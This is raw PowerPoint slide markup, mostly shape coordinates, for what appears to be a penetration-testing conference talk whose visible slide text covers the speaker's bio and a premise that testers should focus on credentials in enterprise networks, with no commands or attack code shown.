                  <a:pt x="133" y="234"/>
                  <a:pt x="128" y="234"/>
                  <a:pt x="122" y="234"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="235"/>
                  <a:pt x="121" y="236"/>
                  <a:pt x="120" y="237"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="244"/>
                  <a:pt x="132" y="252"/>
                  <a:pt x="140" y="258"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="263"/>
                  <a:pt x="156" y="266"/>
                  <a:pt x="167" y="270"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="276"/>
                  <a:pt x="145" y="282"/>
                  <a:pt x="134" y="285"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="289"/>
                  <a:pt x="111" y="290"/>
                  <a:pt x="99" y="292"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="140" y="316"/>
                  <a:pt x="198" y="317"/>
                  <a:pt x="238" y="294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286" y="267"/>
                  <a:pt x="309" y="225"/>
                  <a:pt x="313" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="313" y="166"/>
                  <a:pt x="316" y="160"/>
                  <a:pt x="319" y="157"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="324" y="151"/>
                  <a:pt x="330" y="145"/>
                  <a:pt x="335" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="335" y="139"/>
                  <a:pt x="334" y="139"/>
                  <a:pt x="334" y="139"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="327" y="140"/>
                  <a:pt x="320" y="142"/>
                  <a:pt x="311" y="144"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="135"/>
                  <a:pt x="324" y="128"/>
                  <a:pt x="330" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="120"/>
                  <a:pt x="329" y="119"/>
                  <a:pt x="328" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="325" y="119"/>
                  <a:pt x="323" y="120"/>
                  <a:pt x="321" y="122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="127"/>
                  <a:pt x="300" y="129"/>
                  <a:pt x="288" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="104"/>
                  <a:pt x="234" y="112"/>
                  <a:pt x="221" y="136"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="215" y="147"/>
                  <a:pt x="213" y="160"/>
                  <a:pt x="210" y="174"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC0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B94FF57A-9732-201D-8580-AB8377AD8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5465474" y="2411416"/>
            <a:ext cx="1173968" cy="1154112"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 412 w 414"/>
              <a:gd name="T1" fmla="*/ 204 h 408"/>
              <a:gd name="T2" fmla="*/ 208 w 414"/>
              <a:gd name="T3" fmla="*/ 408 h 408"/>
              <a:gd name="T4" fmla="*/ 4 w 414"/>
              <a:gd name="T5" fmla="*/ 197 h 408"/>
              <a:gd name="T6" fmla="*/ 209 w 414"/>
              <a:gd name="T7" fmla="*/ 0 h 408"/>
              <a:gd name="T8" fmla="*/ 412 w 414"/>
              <a:gd name="T9" fmla="*/ 204 h 408"/>
              <a:gd name="T10" fmla="*/ 221 w 414"/>
              <a:gd name="T11" fmla="*/ 327 h 408"/>
              <a:gd name="T12" fmla="*/ 221 w 414"/>
              <a:gd name="T13" fmla="*/ 214 h 408"/>
              <a:gd name="T14" fmla="*/ 252 w 414"/>
              <a:gd name="T15" fmla="*/ 214 h 408"/>
              <a:gd name="T16" fmla="*/ 260 w 414"/>
              <a:gd name="T17" fmla="*/ 210 h 408"/>
              <a:gd name="T18" fmla="*/ 264 w 414"/>
              <a:gd name="T19" fmla="*/ 170 h 408"/>
              <a:gd name="T20" fmla="*/ 221 w 414"/>
              <a:gd name="T21" fmla="*/ 170 h 408"/>
              <a:gd name="T22" fmla="*/ 221 w 414"/>
              <a:gd name="T23" fmla="*/ 140 h 408"/>
              <a:gd name="T24" fmla="*/ 241 w 414"/>
              <a:gd name="T25" fmla="*/ 120 h 408"/>
              <a:gd name="T26" fmla="*/ 265 w 414"/>
              <a:gd name="T27" fmla="*/ 120 h 408"/>
              <a:gd name="T28" fmla="*/ 265 w 414"/>
              <a:gd name="T29" fmla="*/ 81 h 408"/>
              <a:gd name="T30" fmla="*/ 241 w 414"/>
              <a:gd name="T31" fmla="*/ 79 h 408"/>
              <a:gd name="T32" fmla="*/ 212 w 414"/>
              <a:gd name="T33" fmla="*/ 82 h 408"/>
              <a:gd name="T34" fmla="*/ 176 w 414"/>
              <a:gd name="T35" fmla="*/ 133 h 408"/>
              <a:gd name="T36" fmla="*/ 176 w 414"/>
              <a:gd name="T37" fmla="*/ 171 h 408"/>
              <a:gd name="T38" fmla="*/ 137 w 414"/>
              <a:gd name="T39" fmla="*/ 171 h 408"/>
              <a:gd name="T40" fmla="*/ 137 w 414"/>
              <a:gd name="T41" fmla="*/ 208 h 408"/>
              <a:gd name="T42" fmla="*/ 144 w 414"/>
              <a:gd name="T43" fmla="*/ 214 h 408"/>
              <a:gd name="T44" fmla="*/ 167 w 414"/>
              <a:gd name="T45" fmla="*/ 214 h 408"/>
              <a:gd name="T46" fmla="*/ 176 w 414"/>
              <a:gd name="T47" fmla="*/ 223 h 408"/>
              <a:gd name="T48" fmla="*/ 176 w 414"/>
              <a:gd name="T49" fmla="*/ 315 h 408"/>
              <a:gd name="T50" fmla="*/ 176 w 414"/>
              <a:gd name="T51" fmla="*/ 327 h 408"/>
              <a:gd name="T52" fmla="*/ 221 w 414"/>
              <a:gd name="T53" fmla="*/ 327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14" h="408">
                <a:moveTo>
                  <a:pt x="412" y="204"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="413" y="316"/>
                  <a:pt x="323" y="408"/>
                  <a:pt x="208" y="408"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="96" y="408"/>
                  <a:pt x="0" y="317"/>
                  <a:pt x="4" y="197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8" y="92"/>
                  <a:pt x="94" y="0"/>
                  <a:pt x="209" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323" y="0"/>
                  <a:pt x="414" y="93"/>
                  <a:pt x="412" y="204"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="221" y="327"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="289"/>
                  <a:pt x="221" y="252"/>
                  <a:pt x="221" y="214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="214"/>
                  <a:pt x="242" y="214"/>
                  <a:pt x="252" y="214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="254" y="214"/>
                  <a:pt x="259" y="212"/>
                  <a:pt x="260" y="210"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="262" y="197"/>
                  <a:pt x="263" y="184"/>
                  <a:pt x="264" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="170"/>
                  <a:pt x="236" y="170"/>
                  <a:pt x="221" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="160"/>
                  <a:pt x="221" y="150"/>
                  <a:pt x="221" y="140"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="126"/>
                  <a:pt x="227" y="120"/>
                  <a:pt x="241" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="249" y="119"/>
                  <a:pt x="257" y="120"/>
                  <a:pt x="265" y="120"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="265" y="106"/>
                  <a:pt x="265" y="94"/>
                  <a:pt x="265" y="81"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="81"/>
                  <a:pt x="249" y="79"/>
                  <a:pt x="241" y="79"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="231" y="79"/>
                  <a:pt x="221" y="80"/>
                  <a:pt x="212" y="82"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="89"/>
                  <a:pt x="177" y="108"/>
                  <a:pt x="176" y="133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="175" y="145"/>
                  <a:pt x="176" y="158"/>
                  <a:pt x="176" y="171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="171"/>
                  <a:pt x="150" y="171"/>
                  <a:pt x="137" y="171"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137" y="184"/>
                  <a:pt x="137" y="196"/>
                  <a:pt x="137" y="208"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="137" y="210"/>
                  <a:pt x="141" y="214"/>
                  <a:pt x="144" y="214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="151" y="215"/>
                  <a:pt x="159" y="214"/>
                  <a:pt x="167" y="214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="174" y="213"/>
                  <a:pt x="176" y="216"/>
                  <a:pt x="176" y="223"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="254"/>
                  <a:pt x="176" y="285"/>
                  <a:pt x="176" y="315"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="319"/>
                  <a:pt x="176" y="323"/>
                  <a:pt x="176" y="327"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="191" y="327"/>
                  <a:pt x="205" y="327"/>
                  <a:pt x="221" y="327"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC0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C6391748-CE9D-4B98-775F-887453909322}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8719458" y="2411415"/>
            <a:ext cx="1164019" cy="1154112"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 411 w 411"/>
              <a:gd name="T1" fmla="*/ 205 h 409"/>
              <a:gd name="T2" fmla="*/ 205 w 411"/>
              <a:gd name="T3" fmla="*/ 409 h 409"/>
              <a:gd name="T4" fmla="*/ 0 w 411"/>
              <a:gd name="T5" fmla="*/ 204 h 409"/>
              <a:gd name="T6" fmla="*/ 207 w 411"/>
              <a:gd name="T7" fmla="*/ 1 h 409"/>
              <a:gd name="T8" fmla="*/ 411 w 411"/>
              <a:gd name="T9" fmla="*/ 205 h 409"/>
              <a:gd name="T10" fmla="*/ 106 w 411"/>
              <a:gd name="T11" fmla="*/ 282 h 409"/>
              <a:gd name="T12" fmla="*/ 309 w 411"/>
              <a:gd name="T13" fmla="*/ 282 h 409"/>
              <a:gd name="T14" fmla="*/ 245 w 411"/>
              <a:gd name="T15" fmla="*/ 197 h 409"/>
              <a:gd name="T16" fmla="*/ 207 w 411"/>
              <a:gd name="T17" fmla="*/ 229 h 409"/>
              <a:gd name="T18" fmla="*/ 170 w 411"/>
              <a:gd name="T19" fmla="*/ 197 h 409"/>
              <a:gd name="T20" fmla="*/ 106 w 411"/>
              <a:gd name="T21" fmla="*/ 282 h 409"/>
              <a:gd name="T22" fmla="*/ 207 w 411"/>
              <a:gd name="T23" fmla="*/ 218 h 409"/>
              <a:gd name="T24" fmla="*/ 316 w 411"/>
              <a:gd name="T25" fmla="*/ 124 h 409"/>
              <a:gd name="T26" fmla="*/ 99 w 411"/>
              <a:gd name="T27" fmla="*/ 124 h 409"/>
              <a:gd name="T28" fmla="*/ 207 w 411"/>
              <a:gd name="T29" fmla="*/ 218 h 409"/>
              <a:gd name="T30" fmla="*/ 165 w 411"/>
              <a:gd name="T31" fmla="*/ 192 h 409"/>
              <a:gd name="T32" fmla="*/ 98 w 411"/>
              <a:gd name="T33" fmla="*/ 135 h 409"/>
              <a:gd name="T34" fmla="*/ 98 w 411"/>
              <a:gd name="T35" fmla="*/ 281 h 409"/>
              <a:gd name="T36" fmla="*/ 165 w 411"/>
              <a:gd name="T37" fmla="*/ 192 h 409"/>
              <a:gd name="T38" fmla="*/ 316 w 411"/>
              <a:gd name="T39" fmla="*/ 281 h 409"/>
              <a:gd name="T40" fmla="*/ 316 w 411"/>
              <a:gd name="T41" fmla="*/ 135 h 409"/>
              <a:gd name="T42" fmla="*/ 250 w 411"/>
              <a:gd name="T43" fmla="*/ 193 h 409"/>
              <a:gd name="T44" fmla="*/ 316 w 411"/>
              <a:gd name="T45" fmla="*/ 281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11" h="409">
                <a:moveTo>
                  <a:pt x="411" y="205"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="410" y="318"/>
                  <a:pt x="318" y="409"/>
                  <a:pt x="205" y="409"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="91" y="408"/>
                  <a:pt x="0" y="316"/>
                  <a:pt x="0" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1" y="91"/>
                  <a:pt x="93" y="0"/>
                  <a:pt x="207" y="1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="319" y="1"/>
                  <a:pt x="411" y="93"/>
                  <a:pt x="411" y="205"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="106" y="282"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="175" y="282"/>
                  <a:pt x="241" y="282"/>
                  <a:pt x="309" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="287" y="253"/>
                  <a:pt x="266" y="225"/>
                  <a:pt x="245" y="197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="208"/>
                  <a:pt x="220" y="218"/>
                  <a:pt x="207" y="229"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="218"/>
                  <a:pt x="183" y="208"/>
                  <a:pt x="170" y="197"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="148" y="225"/>
                  <a:pt x="128" y="253"/>
                  <a:pt x="106" y="282"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="207" y="218"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="244" y="186"/>
                  <a:pt x="279" y="156"/>
                  <a:pt x="316" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="124"/>
                  <a:pt x="172" y="124"/>
                  <a:pt x="99" y="124"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136" y="156"/>
                  <a:pt x="171" y="187"/>
                  <a:pt x="207" y="218"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="165" y="192"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="143" y="173"/>
                  <a:pt x="121" y="154"/>
                  <a:pt x="98" y="135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="98" y="184"/>
                  <a:pt x="98" y="231"/>
                  <a:pt x="98" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="121" y="251"/>
                  <a:pt x="143" y="222"/>
                  <a:pt x="165" y="192"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="316" y="281"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="316" y="231"/>
                  <a:pt x="316" y="184"/>
                  <a:pt x="316" y="135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="293" y="155"/>
                  <a:pt x="271" y="174"/>
                  <a:pt x="250" y="193"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="272" y="222"/>
                  <a:pt x="293" y="251"/>
                  <a:pt x="316" y="281"/>
                </a:cubicBezTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC0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5F6442-F75A-8F60-67E7-E43E0A4D593D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1995519" y="4038086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Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stacktitan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Raleway" panose="020B05030301010600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BE9E15-58B4-0306-F879-11CAC92A72FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5239575" y="4038086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Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stacktitan</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/>
              </a:solidFill>
              <a:latin typeface="Raleway" panose="020B05030301010600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6D5674-7AB1-44DE-BF15-BF1CF5BF4035}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7895328" y="4038086"/>
            <a:ext cx="2802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Raleway" panose="020B0503030101060003" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>matt@stacktitan.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000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95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F59A5C8A-AD02-4320-CF74-B5E15637CCFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3185631" y="2600325"/>
            <a:ext cx="1657350" cy="1657350"/>
          </a:xfrm>
          <a:prstGeom prst="frame">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19643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2841FB-70A9-FCB8-E679-31922ECD52AF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5132360" y="2713420"/>
            <a:ext cx="4135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latin typeface="Mohave" panose="00000500000000000000" pitchFamily="50" charset="0"/>
              </a:rPr>
              <a:t>Thank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8D105D-64C5-B1C4-0143-693EB935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1832413" y="5347752"/>
            <a:ext cx="8527173" cy="13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staring at numbers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r="3406"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="6350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34049" y="1966755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An 80% Solution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34049" y="3429000"/>
            <a:ext cx="5186840" cy="384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Field Proven methodology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34050" y="4891245"/>
            <a:ext cx="5186839" cy="823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Tactics, Techniques, and Procedures I’ve Found Useful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6998" y="0"/>
            <a:ext cx="5065160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518031" y="338682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WHAT THIS TALK IS</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="24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129C97-CEF6-1F5E-22D4-6884C9F61B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4A50581-1356-644E-ADFF-AC1DEB675A96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="0"/>
            <a:ext cx="139459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120259-6767-0441-A12C-B7E3AC5DC518}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="-1514667" y="3043488"/>
            <a:ext cx="4450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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr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#&gt; WHOAMI</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="4400" spc="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr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2FC98-8C44-3437-BB31-04662D578440}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909958" y="1986410"/>
            <a:ext cx="475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SECURITY CONSULTANT @ STACKTITAN</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000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0AC5D-B911-3B3D-D5BC-74E74854C306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909958" y="2861197"/>
            <a:ext cx="5644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FORMER INTEL Community GUY</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000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DCE5C-D3E7-32E0-E7BD-B5FF40193FC7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909958" y="3428208"/>
            <a:ext cx="3611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Veteran: US ARMY</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000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51C8F38-E76D-C7BB-0CFD-811478B538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6" r="12006"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1394591" y="1"/>
            <a:ext cx="4091809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BCDD3-ADE1-EA63-6634-E8E4E02DC748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5909958" y="828814"/>
            <a:ext cx="3201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MATTHEW FISHER</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2000" spc="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFC000"/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6BC9C16-E13B-243B-67F1-0E0A06688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3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B4C3D4-FBEB-4088-8992-AA51E82E721A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="38227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4" name="Picture Placeholder 3" descr="Abstract background">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A95585A3-14B6-F188-2699-C4ABABF5A4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16979"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="1062266"/>
            <a:ext cx="3822699" cy="536892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BBA020-5C95-4324-9B9B-A8FE2C7B99B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="71744" y="143408"/>
            <a:ext cx="3679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100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr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THE PREMISE</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" spc="100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill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580160-C0C8-6E96-88E1-CCB9B0D96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8FAE6-090D-399B-F73C-2040C59B429B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273733" y="1290493"/>
            <a:ext cx="1164453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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>ENTERPRISE NETWORK ENVIRONMENTS ARE COMPRISED OF HOSTS AND USERS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DDF8B-76A1-1946-F6F2-CF7AD0E7CC3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273733" y="1993907"/>
            <a:ext cx="116445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od Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>WITH A FEW EXEPTIONS, TARGETING INDIVIDUAL HOSTS TAKES TIME AND OFTEN DOESN’T YIELD OR INCREASE NETWORK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718D5-77C2-C33B-6542-3405D66DE843}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="273733" y="2974320"/>
            <a:ext cx="1164453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od Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>TRADITIONAL METHODOLOGY PLACES EMPHASIS ON ENUMERATION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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>SCANS TAKE TIME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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>OUTPUT CAN BE OVERWHELMING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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>CAN BE DIFFICULT TO SEPARATE WHEAT FROM CHAFF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F833F-913C-0722-9BF2-29220B491618}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2091538" y="4506348"/>
            <a:ext cx="8008924" cy="3693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HOW TO REFOCUS EFFORTS TO MAXIMISE EFFICIENCY?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15234-C2AF-6584-B3EB-7960D0E837D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3002044" y="5015799"/>
            <a:ext cx="6187912" cy="3693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FOCUS ON CREDENTIALS (LOCAL/DOMAIN)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29F415-B5DA-4161-A630-0F1E2EB90E03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013265" y="5525250"/>
            <a:ext cx="6176691" cy="36933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Good Times Rg" panose="020B0605020000020001" pitchFamily="34" charset="77"/>
              </a:rPr>
              <a:t>DOES THIS INCREASE NETWORK ACCESS?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="329692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using a laptop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8538"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6493814" y="1027348"/>
            <a:ext cx="5691188" cy="4579937"/>
          </a:xfrm>
          <a:effectLst>
            <a:softEdge rad="647098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ADA95-ED2F-C746-DD9D-895A8FFEA7D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727520" y="1537850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CREDS ARE GOLD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0A0D6-0110-6F83-7865-BD2C8C6BC795}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="734049" y="2183495"/>
